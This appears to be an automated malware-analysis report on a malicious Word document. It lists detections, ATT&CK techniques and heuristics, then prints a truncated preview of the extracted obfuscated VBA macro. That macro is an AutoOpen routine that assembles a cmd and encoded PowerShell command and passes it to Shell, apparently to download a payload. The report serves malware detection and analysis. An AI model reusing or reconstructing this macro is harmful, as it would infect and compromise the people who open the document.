MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a Word document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, which is a critical indicator of malicious activity. The script attempts to construct and execute a command, likely for downloading and executing a secondary payload. The specific command constructed is too obfuscated to fully reconstruct, but the intent is clear.
Heuristics 6
-
ClamAV: Doc.Malware.Valyria-6691554-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6691554-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13489 bytes |
SHA-256: 135bcfa18c3dbdb5a05f045b2ca66407ebde2b31847fa3a641b11cbb439e292e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "LXkzdYWYjvWjR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Hour 3
Hour Round(39)
Error Fix(aRwrWj + iQhRaQ + HFwbCs + PiSWh)
Hour zfAwrn
Hour Tan(mEazCU - IYXYC)
Shell# KeyString(oGBqAIYAz + vfvoVFuvX + vbKeyC + MOXKjfVpwiqCtK + twjvibcTkm) + bqJTiqt + pYtfHchEc + tzXcs + HEzfTX + BqwHrujIzqN + mWznZT + NzNjUqAV + YijIcQDwZo + WCZwIG + XOjmivnSId + jOjJaGNj + DanQWwuO + zDvpNcrWHANO, 537545227 - 537545227
Hour TypeName(397)
Error Val(510520035)
End Sub
Attribute VB_Name = "UIhEzNLZzWDXzn"
Function tzXcs()
On Error Resume Next
Hour spczP
Hour Sin(ckWiC * ZbEoO - 66536 + 18834)
Hour CBool(43)
iWrbvZ = "mD " + " /V" + " " + " " + " " + " " + " " + " " + " /r" + " " + " " + " "
Hour Val(272489962)
Error Qurwi
Hour Sqr(AHqIOH)
WqnHsbKkqbj = " " + " " + CStr(Chr(wcUjLba + VoiJiFtJ + 34 + IwsfinzYACGEj + JIPziQJRqX)) + " " + " S" + "et " + "{ " + " =" + "pow" + "ers" + "he" + "X"
Hour cHAlL
Error 9
Error Sgn(99044 - nwWOV * 24664 * 74079)
YOmBapwmBUE = "X " + "-e " + "JAB" + "PA#" + "UA" + "$Q" + "A.A" + "G4" + "AZQ" + "B:" + "AC0" + "Abw" + "B'"
Hour kcLZI
Error CDate(24614 - KTsmwo * dXNLq / rkSPlm)
Hour Sgn(320)
pPPzQCATN = "AGo" + "A" + "ZQB" + "jA" + "H" + "QAI" + "AB," + "AG" + "UA" + "dAA" + ";A" + "F" + "c"
Hour Cos(956)
Hour Fix(kJDZBN)
SIiQjOZWTMJ = "A" + "ZQB" + "'" + "A#" + "MAb" + "ABp" + "A" + "GUA" + "b" + "g" + "B0A"
Hour 8
Hour HJAtij
Error huJHS
zkpSDzc = "D" + "sAJ" + "A" + "BUA" + "F" + "M" + "AU" + "QA" + ".AC"
Error CBool(hMpuMq)
Hour IRzdQ
Hour Sqr(41808074)
MjjGwFBA = "cA" + "aAB" + "0A" + "HQA" + "cAA" + "6AC" + "8" + "ALw" + "B;"
Error CCur(AkFtBZ)
Hour EiMdK
oElnpVbQ = "AGQ" + "A" + "c" + "AB2" + "AG" + "4A" + "L" + "g" + "Bj" + "AG" + "8Ab" + "QA" + "vA"
Hour 96
Hour Atn(YXaniS * OfTKf - 69763 * DOjAOw)
Error 4
lAFQiuiHTs = "#oA" + "e" + "Q" + "A" + ":" + "A#" + "MAW" + "AB" + "BA"
tzXcs = iWrbvZ + WqnHsbKkqbj + YOmBapwmBUE + pPPzQCATN + SIiQjOZWTMJ + zkpSDzc + MjjGwFBA + oElnpVbQ + lAFQiuiHTs
Error CCur(151)
Hour Atn(ULzLi)
Hour Tan(46665 / JGzldu / XpnnHu + AtIvq)
End Function
Function HEzfTX()
On Error Resume Next
Error klrmpw
Hour UTAUnk
Hour TypeName(wOzmib)
itIjDiNb = "FM" + "A" + "Q" + "AB" + "o" + "A"
Error zqYHH
Error 32
Error CDate(EmlnSP)
TVwiAib = "H" + "QA" + "d" + "ABw" + "AD"
Error Muvoa
Hour Atn(68863 + RWDZsG + 41092 * MjbwNZ)
Hour CBool(LFcEP * RBqLo)
KibwjqKBED = "o" + "AL" + "wAv" + "AH" + "AA" + "3Q"
Error Str(77806 - TlcDz)
Error Month(94)
CHwkaQ = "ByA" + "GQA" + "ZQB" + "mAG" + "kAe" + "AA" + ";A" + "GMA"
Hour 48051432
Hour 2455
Hour 30
junjzwS = "b" + "w" + "B\A" + "C8A" + "cAB" + "2A" + "HUA" + "T"
Error XRwNif
Hour Atn(jocti)
qoYOh = "A" + "BLA" + "#sA" + "QA" + "BoA" + "H" + "QAd" + "ABw" + "ADo" + "AL" + "w" + "AvA"
Error Tan(96)
Error Fix(ECAbr)
Hour Hex(74671 + TvlbQL)
DZwFAVHvbE = "G" + "IA" + "ZQ" + "B'A" + "GI" + "Ab" + "wB;" + "A" + "Gw" + "AaQ" + "B;"
HEzfTX = itIjDiNb + TVwiAib + KibwjqKBED + CHwkaQ + junjzwS + qoYOh + DZwFAVHvbE
Error sHkfj
Error RwXXz
End Function
Function BqwHrujIzqN()
On Error Resume Next
Hour Rnd(101742117)
Error rzsXb
HZisPA = "AGU" + "ALg" + "Bj" + "A" + "G" + "8A" + "LgB"
Error CDate(DPUcW)
Error CStr(130482207)
GWduSbE = "^%" + "AG" + "sAL" + "w" + "B"
Hour Hex(MTmGHA)
Error CDec(Uisnsv)
kNujjUAbZz = "T" + "AF" + "#" + "A/Q" + "Bv" + "AGw" + "ANQ" + "BAA"
Hour CStr(ktjVsk)
Hour TypeName(9)
omOhRipww = "Gg" + "Ad" + "AB" + "0A" + "HAA" + ",gA" + "v" + "A" + "C" + "8A" + "bAB" + "vAG"
Error iluGS
Hour 90
VRmqW = "4A" + "Z" + "A" + "BvA" + "G" + "4" + "AdA"
Hour Sqr(qtkzb)
Error cfdLU
YjBMtzY = "Bp" + "A" + "G0A" + "ZQB" + "0" +
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.